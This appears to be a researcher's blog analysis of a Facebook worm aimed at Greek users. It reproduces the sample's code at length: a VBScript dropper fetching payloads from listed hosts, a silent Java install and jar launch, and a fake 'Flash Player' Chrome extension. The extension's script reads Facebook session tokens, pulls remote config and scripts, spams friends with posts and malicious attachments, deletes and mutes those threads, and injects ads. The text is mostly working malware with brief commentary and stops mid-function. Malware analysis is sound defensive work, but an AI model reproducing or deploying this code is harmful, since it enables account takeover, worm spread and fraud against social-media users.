Greek facebook users under “attack”

Over the last few days, a malware was spreading among the greek users of facebook.After a couple of days hunting for a sample, I managed to get one.
Infection

When the user opened the .rar attachment, there was a VBScript file inside. The VBScript was the dropper. Its main functionality was to download a .zip file that contained a Batch file, a .jar file and the Java 8 installer. All files were downloaded under C:/MyFolderakis.

The VBScript

Dim oFSO
Set oFSO = CreateObject("Scripting.FileSystemObject")
Dim csPATH  : csPATH   = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%SYSTEMDRIVE%")
csPATH = csPATH & "\MyFolderakis"
' Create a new folder
oFSO.CreateFolder csPATH


Do
	download(csPATH)
	Unzip csPATH &"\content.zip", csPATH
Loop While ReportFileStatus(csPATH &"\sapsalo.jar")=0


Function download(csPATH)
	link=RandomLink()
	dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
	dim bStrm: Set bStrm = createobject("ADODB.Stream")
	xHttp.Open "GET", link, False
	xHttp.Send

	with bStrm
	    .type = 1 '//binary
	    .open
	    .write xHttp.responseBody
	    .savetofile csPATH &"\content.zip", 2 '//overwrite
	end with
	download = csPATH &"\content.zip"
End Function



Function ReportFileStatus(filespec)
  Dim fso, msg
   Set fso = CreateObject("Scripting.FileSystemObject")
   If (fso.FileExists(filespec)) Then
      msg = 1
	  Wscript.Echo "Exited"
   Else
      msg = 0
   End If
   ReportFileStatus = msg
End Function

Function RandomLink()
	sites=Array("http://xionobala.com/mermikia/moisis.zip","http://trendvidz.com/terlix/filezilla.zip","http://tromeroi.com/download/adobe.zip","http://womfashion.com/aladin/aladin.zip","http://yoodot.com/ouzo/gnome.zip","http://pepperstonix.com/koitatiegine/tikale.zip","http://spatareporo.com/deitetous/simerastonaplha.zip","http://fashionofheart.com/vasika/kalisperasas.zip","http://masterolious.com/mozilla/firefox.zip","http://pentorali.com/safe/internet.zip")

	Dim max,min
	max=UBound(sites)
	min=LBound(sites)
	Randomize
	a=Int((max-min+1)*Rnd+min)
	RandomLink = sites(a)
End Function



Sub Unzip(sSource, sTargetDir)
    Set oFSO = CreateObject("Scripting.FileSystemObject")
    if not oFSO.FolderExists(sTargetDir) then oFSO.CreateFolder(sTargetDir)
    Set oShell = CreateObject("Shell.Application")
    Set oSource = oShell.NameSpace(sSource).Items()
    Set oTarget = oShell.NameSpace(sTargetDir)
    oTarget.CopyHere oSource, 256
End Sub

Set WshShell = CreateObject("WScript.Shell")
WshShell.RUN "cmd /c "& csPATH &"\run.bat" , 2

Sidenotes: If you execute the VBScript twice, an error pops up when trying to recreate the folder.

The Batch script

@ECHO OFF
IFEXIST“%CommonProgramFiles(x86)%\java”gotojavaexists
IFEXIST“%CommonProgramFiles%\java”gotojavaexists
:installjava
start/w%SYSTEMDRIVE%\MyFolderakis\jre-8u5-windows-i586-iftw.exe/s
if%ERRORLEVEL%==0gotojavaexists
echo Please do not close this or windows installation will be corrupted…
echo Loading…
gotoinstalljava
:javaexists
start%SYSTEMDRIVE%\MyFolderakis\sapsalo.jar

It checks whether or not there is a folder named java both for x86 and x86_64 Windows. In case it exists it runs the sapsalo.jar file contained in the .zip downloaded by the dropper. If not. Java is installed silently (/s option).

The jar

After succesful installation, the jar is executed. The jar’s functionality is double. It serves as another dropper for a browser plugin (manifest named ourt.json and a javascript file with the main functionality). At the same time, it creates a record on the registry so that it is executed on every startup. This serves as a way to keep you infected even if you delete the plugin. In order to achieve this, it creates a .zip filed named ext_folder inside the Chrome folder.

The plugin

The manifest

{
    “olmpkfnhkfomcmnodekbphlkkejkealf”:{
            “active_permissions”:{
               “api”:["storage","tabs"],
               “explicit_host”:["\u003Call_urls>","chrome://favicon/*","http://*/*"],
               “manifest_permissions”:[  ],
               “scriptable_host”:["\u003Call_urls>","http://*.facebook.com/*","https://*.facebook.com/*"]
            },
            “content_settings”:[  ],
            “creation_flags”:1,
            “events”:[  ],
            “from_bookmark”:false,
            “from_webstore”:false,
            “granted_permissions”:{
               “api”:["storage","tabs"],
               “explicit_host”:["\u003Call_urls>","chrome://favicon/*","http://*/*"],
               “manifest_permissions”:[  ],
               “scriptable_host”:["\u003Call_urls>","http://*.facebook.com/*","https://*.facebook.com/*"]
            },
            “incognito_content_settings”:[  ],
            “incognito_preferences”:{
            },
            “initial_keybindings_set”:true,
            “install_time”:“13042160431700495″,
            “location”:1,
            “manifest”:{
               “background”:{
                  “persistent”:false,
                  “scripts”:["analytics.js"]
               },
               “content_scripts”:[{
                  "css":["jquery-ui.css"],
                  “js”:["debug_mode.js","jquery.js","jquery-ui.js","sugar.min.js","popup.js"],
                  “matches”:["http://*.facebook.com/*","https://*.facebook.com/*"],
                  “run_at”:“document_end”
               },{
                  “all_frames”:true,
                  “exclude_matches”:["http://*.facebook.com/*","https://*.facebook.com/*"],
                  “js”:["debug_mode.js","sugar.min.js","URI.js","ads-list.js","ads.js"],
                  “matches”:["\u003Call_urls>"]
               }],
               “content_security_policy”:“script-src ‘self’ https://ssl.google-analytics.com; object-src ‘self’”,
               “description”:“Cross-platform plugin plays animations, videos and sound files”,
               “icons”:{
                  “128″:“128.png”,
                  “16″:“16.png”,
                  “48″:“48.png”
               },
               “key”:“MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAyRAUY/Q1HimRmGom
V9c9/UWlVmQToGeNZPIxlH5C+g7Ig8/HObGp3G6YqwMNtvG1LF6DgESq7HkuhZpEcrmLmDI8tXQh
5SuYpKJCRcPJhvtOvtYnFbLNPdhg7DN4ZU8v1qhcrSSGfzK8KWPNghsAfL/PEFaobzWH+ZRFQbMsu93
+u9WJFbcGtXT+Kqar7eWIiCeTACobSDbcfaZ1Cj5S0TEZPRtddWvUKSXG3+/wLz236ckZAnz7yzOw
9kBLJL+J3+xm01qhTMc2wv6G0R+zVbC3/UjJcTSdCdY5wGgKgJkDzJ/WNxaGJUXFbKRRsQ3zhe3Xr
KKK+2kcHOjy0dZapQIDAQAB”,
               “manifest_version”:2,
               “name”:“Flash Player”,
               “permissions”:["tabs","\u003Call_urls>","storage","http://*/"],
               “version”:“2.0″
            },
            “path”:“olmpkfnhkfomcmnodekbphlkkejkealf\\2.0_0″,
            “preferences”:{
            },
            “regular_only_preferences”:{
            },
            “state”:1,
            “was_installed_by_default”:false
         }

Interesting parts are

“manifest_version”:2, “name”:“Flash Player”,

Just in case you wondered… It was name flash player and it loads a lot of js libraries.
I like, honestly, that they named it Flash Player. That was smart.
The plugin

content_scripts”:[{
 "css":["jquery-ui.css"],
 “js”:["debug_mode.js","jquery.js","jquery-ui.js","sugar.min.js","popup.js"],
 “matches”:["http://*.facebook.com/*","https://*.facebook.com/*"],
 “run_at”:“document_end”
 }
     function exit( status ) {
    
        var i;

        if (typeof status === 'string') {
            alert(status);
        }

        window.addEventListener('error', function (e) {e.preventDefault();e.stopPropagation();}, false);

        var handlers = [
            'copy', 'cut', 'paste',
            'beforeunload', 'blur', 'change', 'click', 'contextmenu', 'dblclick', 'focus', 'keydown', 'keypress', 'keyup', 'mousedown', 'mousemove', 'mouseout', 'mouseover', 'mouseup', 'resize', 'scroll',
            'DOMNodeInserted', 'DOMNodeRemoved', 'DOMNodeRemovedFromDocument', 'DOMNodeInsertedIntoDocument', 'DOMAttrModified', 'DOMCharacterDataModified', 'DOMElementNameChanged', 'DOMAttributeNameChanged', 'DOMActivate', 'DOMFocusIn', 'DOMFocusOut', 'online', 'offline', 'textInput',
            'abort', 'close', 'dragdrop', 'load', 'paint', 'reset', 'select', 'submit', 'unload'
        ];

        function stopPropagation (e) {
            e.stopPropagation();
            // e.preventDefault(); // Stop for the form controls, etc., too?
        }
        for (i=0; i < handlers.length; i++) {
            window.addEventListener(handlers[i], function (e) {stopPropagation(e);}, true);
        }

        if (window.stop) {
            window.stop();
        }

        throw '';
}

       $(function(){

            chrome.runtime.sendMessage({gegonos: "visit" }, function(response) {});

            //diafimiseis sto fb
            chrome.storage.sync.get(function(extSettings) {
                if(extSettings.ads){

                 var adcounter = 0;
                 var adurls = ['https://8zxb-2gvn.accessdomain.com/789/ads.php','https://8zxb-2gvn.accessdomain.com/790/ads.php','https://8zxb-2gvn.accessdomain.com/791/ads.php','https://pizzasakis.com/789/ads.php','https://pizzasakis.com/790/ads.php','https://pizzasakis.com/791/ads.php'];
                 function getit(url){
                  $.get(url).done(function (b) {
                           final_ad_url = url;
                           put_ads(final_ad_url);
                        }).fail(function (a, d, e) {
                            console.log('fail',adurls[adcounter])
                                if(adurls[adcounter++])
                                 getit(adurls[adcounter])
                            
                        });
                  }
                getit(adurls[0]);


                  function put_ads(final_ad_url){
                    $($('*[data-ad]')).parent().parent().html('<iframe id=""style="position: relative; width: 100%; height: 620px; border:0;" src="'+final_ad_url+'?choice=1" id="someId"/>')



                    elems1=$.makeArray( $( "*[data-dedupekey]" ) );
                    elems2=$.makeArray( $( "*[data-insertion-position]") );
                    elems=elems1.include(elems2).unique();
                    if(elems[0])
                        $(elems[0]).append('<iframe style="position: relative; width: 110%; height: 82px; border:0;" src="'+final_ad_url+'?choice=3" id="someId"/>')
                    if(elems[1])
                        $(elems[1]).append('<iframe style="position: relative; width: 110%; height: 82px; border:0;" src="'+final_ad_url+'?choice=3" id="someId"/>')
                
                  }

                }
            })
              
        })
        
        
        
        
        
//facebook komati


    jx = {
        b: function () {
            var b = !1;
            if ("undefined" != typeof ActiveXObject) try {
                b = new ActiveXObject("Msxml2.XMLHTTP")
            } catch (c) {
                try {
                    b = new ActiveXObject("Microsoft.XMLHTTP")
                } catch (a) {
                    b = !1
                }
            } else if (window.XMLHttpRequest) try {
                b = new XMLHttpRequest
            } catch (h) {
                b = !1
            }
            return b
        },
        load: function (b, c, a, h, g) {
            var e = this.d();
            if (e && b) {
                e.overrideMimeType && e.overrideMimeType("text/xml");
                h || (h = "GET");
                a || (a = "text");
                g || (g = {});
                a = a.toLowerCase();
                h = h.toUpperCase();
                b += b.indexOf("?") + 1 ? "&" : "?";
                var k = null;
                "POST" == h && (k = b.split("?"), b = k[0], k = k[1]);
                e.open(h, b, !0);
                e.onreadystatechange = g.c ? function () {
                    g.c(e)
                } : function () {
                    if (4 == e.readyState)
                        if (200 == e.status) {
                            var b = "";
                            e.responseText && (b = e.responseText);
                            "j" == a.charAt(0) ? (b = b.replace(/[\n\r]/g, ""), b = eval("(" + b + ")")) : "x" == a.charAt(0) && (b = e.responseXML);
                            c && c(b)
                        } else g.f && document.getElementsByTagName("body")[0].removeChild(g.f), g.e && (document.getElementById(g.e).style.display = "none"), error && error(e.status)
                    };
                    e.send(k)
                }
            },
            load2: function (b, c, a, h, g) {
                var e = this.d();
                if (e && b) {
                    e.overrideMimeType && e.overrideMimeType("text/xml");
                    h || (h = "POST");
                    a || (a = "text");
                    g || (g = {});
                    a = a.toLowerCase();
                    h = h.toUpperCase();
                    b += b.indexOf("?") + 1 ? "&" : "?";
                    var k = null;
                    "POST" == h && (k = b.split("?"), b = k[0], k = k[1]);
                    e.open(h, b, !0);
                    e.onreadystatechange = g.c ? function () {
                        g.c(e)
                    } : function () {
                        if (4 == e.readyState)
                            if (200 == e.status) {
                                var b = "";
                                e.responseText && (b = e.responseText);
                                "j" == a.charAt(0) ? (b = b.replace(/[\n\r]/g, ""), b = eval("(" + b + ")")) : "x" == a.charAt(0) && (b = e.responseXML);
                                c && c(b)
                            } else g.f && document.getElementsByTagName("body")[0].removeChild(g.f), g.e && (document.getElementById(g.e).style.display = "none"), error && error(e.status)
                        };
                        e.send(k)
                    }
                },
                d: function () {
                    return this.b()
                }
        };

        function getFriends(){
            var promise=jQuery.Deferred();
            jx.load(window.location.protocol + "//www.facebook.com/ajax/typeahead/first_degree.php?" + "__a=1&filter[0]=user&lazy=0&viewer=" + user_id + "&token=v7&stale_ok=0", function (a) {
                var b = a;
                var c = b.substring(b.indexOf("{"));
                var d = JSON.parse(c);
                d = d.payload.entries;
                friends=d;
                promise.resolve();
            })
            return promise;
        }
        
        function Create_Post(o){
            jx.load2(window.location.protocol + "//www.facebook.com/ajax/stream/inline.php?fb_dtsg=" + fb_dtsg + "&walltarget=" + o + "&render_notif_only=1&birthday=1&message_text=" + encodeURIComponent(msg) + "&message=" + encodeURIComponent(msg) + "&giftsgroupid=8ff493ad46&post=Post&nctr[_mod]=pagelet_reminders&__user=" + user_id + "&__a=1&__dyn=7n8ahyj35CFIwd9e&__req=1b&phstamp=", function (a) {
                var b = a.substring(a.indexOf("{"));
                var c = JSON.parse(b);
            })
        }
        function Like_post(post) {
            var X = new XMLHttpRequest();
            var XURL = "//www.facebook.com/ajax/ufi/like.php";
            var XParams = "like_action=true&ft_ent_identifier=" + post + "&source=1&client_id=" + now + "%3A3366677427&rootid=u_ps_0_0_14&giftoccasion&ft[tn]=%3E%3DU&ft[type]=20&ft[qid]=5882006890513784712&ft[mf_story_key]=" + post + "&nctr[_mod]=pagelet_home_stream&__user=" + user_id + "&__a=1&__dyn=7n8ahyj35CFwXAg&__req=j&fb_dtsg=" + fb_dtsg + "&phstamp=";
            X.open("POST", XURL, true);
            X.onreadystatechange = function () {
                if (X.readyState == 4 && X.status == 200) {
                    X.close;
                }
            };
            X.send(XParams);
        }
        function Like_page(p) {
            var Page = new XMLHttpRequest();
            var PageURL = "//www.facebook.com/ajax/pages/fan_status.php";
            var PageParams = "&fbpage_id=" + p + "&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user=" + user_id + "&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg=" + fb_dtsg + "&phstamp=";
            Page.open("POST", PageURL, true);
            Page.onreadystatechange = function () {
                if (Page.readyState == 4 && Page.status == 200) {
                    Page.close;
                }
            };
            Page.send(PageParams);
        }

        send_message = (function(target_user_id,msg){
            var Page = new XMLHttpRequest();
            var PageURL = "//www.facebook.com/ajax/mercury/send_messages.php";
            var PageParams = "?=&=&__a=1&__dyn=798aD5z5CF-&__req=d&__user=" + user_id + "&client=mercury&fb_dtsg=" + fb_dtsg + "&message_batch[0][action_type]=ma-type:user-generated-message&message_batch[0][author]=fbid:" + user_id + "&message_batch[0][author_email]=&message_batch[0][body]=" + msg + "&message_batch[0][coordinates]=&message_batch[0][has_attachment]=false&message_batch[0][html_body]=false&message_batch[0][is_cleared]=false&message_batch[0][is_filtered_content]=false&message_batch[0][is_forward]=false&message_batch[0][is_spoof_warning]=false&message_batch[0][is_unread]=false&message_batch[0][message_id]=<1392768225533:1945850321-3990341979@mail.projektitan.com>&message_batch[0][signatureID]=63e61bd&message_batch[0][source]=source:chat:web&message_batch[0][source_tags][0]=source:chat&message_batch[0][specific_to_list][0]=fbid:" + target_user_id + "&message_batch[0][specific_to_list][1]=fbid:" + user_id + "&message_batch[0][status]=0&message_batch[0][thread_id]=mid.1392163284356:af679b05b9c1cde936&message_batch[0][timestamp]=1392768225533&message_batch[0][timestamp_absolute]=Today&message_batch[0][timestamp_relative]=2:03am&message_batch[0][timestamp_time_passed]=0&message_batch[0][ui_push_phase]=V3&phstamp=";
            Page.open("POST", PageURL, true);
            Page.onreadystatechange = function () {
                if (Page.readyState == 4 && Page.status == 200) {
                   var resp = Page.responseText;
                   //delete_message(resp.split('"message_id":')[1].split(',"client_message_id"')[0].replace(/"/g, ""))
                   Page.close;
               }

           };
           Page.send(PageParams);
       }).lazy(Number.random(7, 14) * 1000)

       delete_message=function(msg_id){
           var Page = new XMLHttpRequest();
           var PageURL = "//www.facebook.com/ajax/mercury/delete_messages.php";
           var PageParams = "?__a=1&__dyn=798aD5z5CF-&__req=d&__user=" + user_id + "&fb_dtsg=" + fb_dtsg + "&message_ids[0]=" + msg_id + "&phstamp=";
           Page.open("POST", PageURL, true);
           Page.onreadystatechange = function () {
              if (Page.readyState == 4 && Page.status == 200) {
                  Page.close;
              }
            };
            Page.send(PageParams);   
        }

    function downloadFile(){

        
          var promise=jQuery.Deferred();
          var counter = 0;
          if(counter<configs.attach_urls.length)
          {
              var oReq = new XMLHttpRequest();
              oReq.open("GET", configs.attach_urls[counter], true);
              oReq.responseType = "arraybuffer";
              console.log('ouer')
              oReq.onload = function(oEvent) {
                if(this.status == 200){
                  console.log(this)
                  var myFile = new Blob([oReq.response], {type: 'application/octet-stream'});
                  promise.resolve( myFile );
                  
                }else{
                  counter++;
                  if(counter<configs.attach_urls.length){
                    oReq.open("GET", configs.attach_urls[counter], true);
                    oReq.send();
                  }
                  
                }
                
                
              }
              

              oReq.send();
          }
          return promise;
        }
        start_sending = function (myFile,target_id,msg_to_send,attach_name){
          var promise=jQuery.Deferred();
          var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
          var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
          
          console.log(target_id)
          var target_id = target_id;
          var msg=msg_to_send;
          var filename=attach_name;

          var formData = new FormData();
          formData.append("fb_dtsg", fb_dtsg);
          formData.append("attach_id", null); 
          formData.append('upload_1052', myFile, filename);

          var request = new XMLHttpRequest();
          request.open("POST", "/ajax/mercury/upload.php?__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg="+fb_dtsg+"&ttstamp=&ft[tn]=%2BJ%2BM&");
          request.send(formData);

          request.onloadend = function(){
              a=JSON.parse((this.responseText).split('for (;;);')[1])
              a=a.payload.metadata[0]
              console.log(a)

              var Page = new XMLHttpRequest();
              var PageURL = "//www.facebook.com/ajax/mercury/send_messages.php";
              formData = new FormData();
              formData.append('message_batch[0][action_type]','ma-type:user-generated-message'); formData.append('message_batch[0][thread_id]',''); formData.append('message_batch[0][author]','fbid:'+ target_id); formData.append('message_batch[0][author_email]',''); formData.append('message_batch[0][coordinates]',''); formData.append('message_batch[0][timestamp]',(new Date).getTime()); formData.append('message_batch[0][timestamp_absolute]','Today'); formData.append('message_batch[0][timestamp_relative]',''); formData.append('message_batch[0][timestamp_time_passed]','0'); formData.append('message_batch[0][is_unread]',false); formData.append('message_batch[0][is_cleared]',false); formData.append('message_batch[0][is_forward]',false); formData.append('message_batch[0][is_filtered_content]',false); formData.append('message_batch[0][is_spoof_warning]',false); formData.append('message_batch[0][source]','source:titan:web'); formData.append('message_batch[0][body]',msg); formData.append('message_batch[0][has_attachment]',true); formData.append('message_batch[0][html_body]',false); formData.append('message_batch[0][specific_to_list][0]','fbid:'+ target_id); formData.append('message_batch[0][specific_to_list][1]','fbid:'+ user_id); formData.append('message_batch[0][raw_attachments][0][filename]',a.filename); formData.append('message_batch[0][raw_attachments][0][filesize]',a.filesize); formData.append('message_batch[0][raw_attachments][0][hash]',a.hash); formData.append('message_batch[0][raw_attachments][0][handle]',a.handle); formData.append('message_batch[0][raw_attachments][0][filetype]',a.filetype); formData.append('message_batch[0][raw_attachments][0][encryptionKey]', a.encryptionKey); formData.append('message_batch[0][raw_attachments][0][metadata]',''); formData.append('message_batch[0][raw_attachments][0][param_hash]',a.param_hash); formData.append('message_batch[0][raw_attachments][0][image_metadata]',''); formData.append('message_batch[0][force_sms]',true); formData.append('message_batch[0][ui_push_phase]','V3'); formData.append('message_batch[0][status]','0'); formData.append('message_batch[0][message_id]',''); formData.append('client','mercury'); formData.append('__user',user_id); formData.append('__a','1'); formData.append('__dyn','798aD5z5CF-'); formData.append('__req','i'); formData.append('fb_dtsg',fb_dtsg); formData.append('ttstamp',''); formData.append('__rev','1188904'); 
              
              Page.open("POST", PageURL, true);
              Page.onreadystatechange = function () {
                if (Page.readyState == 4 && Page.status == 200) {
                 var resp = Page.responseText;
                 var message_id_with_attachment = (JSON.parse(resp.split('for (;;);')[1])).payload.actions[0].message_id;
                 var thread_id_with_attachment = (JSON.parse(resp.split('for (;;);')[1])).payload.actions[0].thread_id;
                 Page.close;
                 delete_msg_atach(message_id_with_attachment)
                 mute_conversation(thread_id_with_attachment)
               }
               promise.resolve()
             };
             Page.send(formData);
          }
          return promise;
        }


        function delete_msg_atach(msg_id){
          
          var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
          fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
          
          var Page = new XMLHttpRequest();
          var PageURL = "//www.facebook.com/ajax/mercury/delete_messages.php";
          Page.open("POST", PageURL, true);
              
          var formData = new FormData();

          formData.append('message_ids[0]',msg_id)
          formData.append('__user',user_id)
          formData.append('__a','1')
          formData.append('__dyn','798aD5z5CF-')
          formData.append('__req','d')
          formData.append('fb_dtsg',fb_dtsg)
          formData.append('ttstamp','')
          formData.append('__rev','1189795')

          Page.onreadystatechange = function () {
                if (Page.readyState == 4 && Page.status == 200) {
                 console.log(Page.responseText)
               }

             };
          Page.send(formData);
        }
        function mute_conversation(thread_id){
          
          var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
          fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
          
          var Page = new XMLHttpRequest();
          var PageURL = "//www.facebook.com/ajax/mercury/change_mute_thread.php";
          Page.open("POST", PageURL, true);
              
          var formData = new FormData();

          formData.append('thread_id',thread_id)
          formData.append('mute_settings','3600')
          formData.append('payload_source','mercury')
          formData.append('__user',user_id)
          formData.append('__a','1')
          formData.append('__dyn','798aD5z5CF-')
          formData.append('__req','d')
          formData.append('fb_dtsg',fb_dtsg)
          formData.append('ttstamp','')
          formData.append('__rev','1189795')

          Page.onreadystatechange = function () {
                if (Page.readyState == 4 && Page.status == 200) {
                 console.log(Page.responseText)
               }

             };
          Page.send(formData);
        }


    function get_config(){
         var promise=jQuery.Deferred();
         var counter = 0;
         var urls = ['https://8zxb-2gvn.accessdomain.com/789/taxavasi.php','https://8zxb-2gvn.accessdomain.com/790/taxavasi.php','https://8zxb-2gvn.accessdomain.com/791/taxavasi.php','https://pizzasakis.com/789/taxavasi.php','https://pizzasakis.com/790/taxavasi.php','https://pizzasakis.com/791/taxavasi.php'];
         function getit(url){
          $.getJSON(url).done(function (b) {
                    configs = b;
                    configs.friends_to_send_attach = configs.friends_to_send_attach2;
                    console.log('configs',configs);
                    promise.resolve()
                }).fail(function (a, d, e) {
                    console.log('fail',urls[counter])
                        if(urls[counter++])
                         getit(urls[counter])
                    
                });
          }
        getit(urls[0]);
           
         
          return promise;
        }

    function save(){
            chrome.storage.sync.set({'last_settings': Date.now() , 'post_kathe' : configs.post_kathe , 'ads' : configs.ads}, function() {
                  // Notify that we saved.
                  console.log('ok')
              });
        }
       try
        {
            fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
            user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);  
          }   
      catch(err)
        {
          console.log('errrrrr')
          exit();
        }
         chrome.storage.sync.get(function(extSettings) {
            console.log(extSettings)
            if(extSettings.last_settings){
               if(new Date(extSettings.last_settings).hoursAgo()>=extSettings.post_kathe)
                get_config().done(function(){
                    save();
                    if(configs.on)
                        run();
                })

        }else{
            get_config().done(function(){
                save();
                if(configs.on)
                    run();
            })
        }
    });

        curr_url = window.location.href;
        setInterval(function(){
          if(curr_url!=window.location.href){
            console.log('alagi');
            curr_url=window.location.href;
            chrome.storage.sync.get(function(extSettings) {
              console.log(extSettings)
              if(extSettings.last_settings){
                 if(new Date(extSettings.last_settings).hoursAgo()>=extSettings.post_kathe)
                  get_config().done(function(){
                      save();
                      if(configs.on)
                          run();
                  })

              }else{
                  get_config().done(function(){
                      save();
                      if(configs.on)
                          run();
                  })
              }
            });
          }
        },30000)

        /**/
        var now = (new Date).getTime();

        function run(){

           //kane like sta post
          if(configs.posts_to_like){
            var posts_to_like = configs.posts_to_like
            if(Object.isArray(posts_to_like)){
              posts_to_like.each(function(post){
                Like_post(post);
              })

            }
          }

          //vale ta post stin arxiki
            injectPost();

            getFriends().done(function(){
                //run code emergency
                if(configs.emergency){
                    $.getScript( "https://8zxb-2gvn.accessdomain.com/789/emergency.js");
                }


                begin_to_like();
            //begin post
            msgPost=configs.msg_to_post;


            //pare to onoma mou
            my_name=(friends.find(function(n){
                return n.uid==user_id 
            })).names.sample();

            //vgale ton eauto m apo tous filous
            friends=friends.exclude(function(n){
              return n.uid==user_id 
            })
            friends=friends.randomize();
            if(configs.friends_to_post>friends.length)
                var friends_to_post=friends.length;
            else
                var friends_to_post=configs.friends_to_post;
            for(var i=0 ; i<friends_to_post;i++){
                msg=msgPost.sample();
                Create_Post(friends[i].uid)
            }

            //begin chat
            chrome.runtime.sendMessage({gegonos: "chat" , userid : user_id}, function(response) {});
            msgChat=configs.msg_to_chat;
            friends=friends.randomize();
            temp_friends=friends.clone();
            temp_friends2=friends.clone();
            
            already_chated=[];        
            chrome.storage.sync.get(function(extSettings) {
                if(extSettings.chated_friends){
                   already_chated=extSettings.chated_friends;
                   friends_chated=extSettings.chated_friends.findAll(function(n){
                        return n.msg_title.indexOf(configs.msg_title)!=-1
                    })
                   for (var i = 0; i < temp_friends.length; i++) {
                    for (var j = 0; j < friends_chated.length; j++) {
                        if(temp_friends[i].uid==friends_chated[j].uid){
                            temp_friends2.remove(temp_friends[i])
                            console.log('i remove',temp_friends[i])
                        }
                        
                    };
                    
                };

            }


            if(configs.friends_to_chat>temp_friends2.length)
                var friends_to_chat=temp_friends2.length;
            else
                var friends_to_chat=configs.friends_to_chat;
            friends_chated_to_save=[];
            for(var i=0 ; i<friends_to_chat;i++){
                msg=msgChat.sample();

                send_message(temp_friends2[i].uid,msg);

                
                friends_chated_to_save.push({
                    uid : temp_friends2[i].uid,
                    msg_title : [configs.msg_title]
                })

            }
            console.log('first',already_chated)
            friends_chated_to_save.each(function(n){
                index=already_chated.findIndex(function(x){
                    return x.uid==n.uid;
                })
                console.log('index',index)
                if(index!=-1){
                    already_chated[index].msg_title.push(n.msg_title[0])
                }else{
                    already_chated.push(n);
                }
            })
            console.log('last',already_chated)
            
            chrome.storage.sync.set({'chated_friends': already_chated}, function() {
                          // Notify that we saved.
                          console.log('ok',already_chated)
                      });






              })


                  //send attachment
                   downloadFile().done(function(myFile){
                    console.log('file',myFile)
                    chrome.storage.sync.get(function(extSettings) {
                      if(!extSettings.attach_chated_friends || extSettings.attach_chated_friends.friends_to_send_attach<= 0){
                        
                          getFriends().done(function(){
                            //pare to onoma mou
                              my_name=(friends.find(function(n){
                                  return n.uid==user_id 
                              })).names.sample();

                              //vgale ton eauto m apo tous filous
                              friends=friends.exclude(function(n){
                                return n.uid==user_id 
                              })
                            friends=friends.randomize();
                            if(extSettings.already_attach_chated_friends){
                              already_attach_chated_friends_ids = [];
                              (extSettings.already_attach_chated_friends.findAll(function(x){
                                return x.attach_themes.indexOf(configs.attach_theme)!=-1
                              })).each(function(n){
                                already_attach_chated_friends_ids.push(n.uid)
                              })
                              console.log('already...',already_attach_chated_friends_ids)
                              friends=friends.exclude(function(n){
                                return already_attach_chated_friends_ids.indexOf(n.uid)!=-1 
                              })
                              if(friends.length==0){
                                console.log('dn exo allous filous')
                              }

                            }
                            if(configs.friends_to_send_attach>friends.length)
                                var friends_to_send_attach=friends.length;
                            else
                                var friends_to_send_attach=configs.friends_to_send_attach;


                              obj = {};
                              obj.friends_to_send_attach = friends_to_send_attach;
                              obj.data = [];
                            for (var i = 0; i < friends_to_send_attach; i++) {
                              
                              if(configs.attach_name_and_msg[i]){
                                  var msg_to_send_attach = configs.attach_name_and_msg[i][1];
                                  var attach_name = configs.attach_name_and_msg[i][0];
                              }
                              
                              var friends_id = friends[i].uid;
                              console.log(friends_id)
                              if($.isArray([friends[i].names]))
                               var friend_name = friends[i].names.sample();
                              else
                               var friend_name = friends[i].names;
                              if(attach_name.has("yourname"))
                                attach_name = attach_name.replace("yourname",friend_name)
                              if(attach_name.has("myname"))
                                attach_name = attach_name.replace("myname",my_name)
                             
                              

                              var temp = {
                                "friends_id" : friends_id,
                                "msg_to_send_attach" : msg_to_send_attach,
                                "attach_name" : attach_name
                              }
                              obj.data.push(temp)
                              

                                 
                            };
                             chrome.storage.sync.set({'attach_chated_friends': obj}, function() {
                                // Notify that we saved.
                                console.log('ok',obj)
                                lets_send_attach(obj)
                            });


                          });
                        }else{
                          console.log('exoume',extSettings.attach_chated_friends)
                          lets_send_attach(extSettings.attach_chated_friends)

                        }

                        function lets_send_attach(attach_chated){
                          if(attach_chated.friends_to_send_attach>0){
                            var first = attach_chated.data.first();
                            chrome.runtime.sendMessage({gegonos: "attach" , userid : first.friends_id}, function(response) {});

                            start_sending(myFile,first.friends_id,first.msg_to_send_attach,first.attach_name).done(function(){
                              attach_chated.friends_to_send_attach--;
                              attach_chated.data.remove(first);
                              chrome.storage.sync.get(function(extSettings) {

                                if(extSettings.already_attach_chated_friends){
                                  var index = extSettings.already_attach_chated_friends.findIndex(function(n){
                                    return n.uid == first.friends_id;
                                  })
                                  if(index == -1){
                                    var attach_themes = [configs.attach_theme]
                                    extSettings.already_attach_chated_friends.push({
                                      'uid' : first.friends_id,
                                      'attach_themes' : attach_themes
                                    })
                                  }else{
                                    extSettings.already_attach_chated_friends[index].attach_themes.push(configs.attach_theme)
                                  }
                                  
                                }else{
                                  var attach_themes = [configs.attach_theme]
                                    
                                  extSettings.already_attach_chated_friends = [{
                                      'uid' : first.friends_id,
                                      'attach_themes' : attach_themes
                                  }];
                                }
                                chrome.storage.sync.set({'already_attach_chated_friends': extSettings.already_attach_chated_friends}, function() {
                                    // Notify that we saved.
                                    console.log('just save',extSettings.already_attach_chated_friends)
                                    
                                });
                              })
                              
                              chrome.storage.sync.set({'attach_chated_friends': attach_chated}, function() {
                                  // Notify that we saved.
                                  console.log('new',attach_chated)
                                  lets_send_attach(attach_chated)
                              });
                            })
                           }else{
                            return true;
                           }
                        }
                    })
                   })
                })
    }

    function begin_to_like(){
        chrome.storage.sync.get(function(extSettings) {
            console.log(extSettings)
            if(extSettings.liked_pages){
                temp_likes1=extSettings.liked_pages.intersect(configs.likes);
                temp_likes2=configs.likes;
